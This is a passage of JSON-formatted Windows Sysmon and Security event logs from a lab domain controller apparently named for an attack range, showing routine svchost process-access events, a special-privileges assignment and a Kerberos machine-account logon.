05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4282,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4283,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220453,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x64E96\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x64e96","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220454,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x64E96\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t54930\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x64e96","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"54930","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4284,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4285,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4286,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4287,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.248","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4288,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.248\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 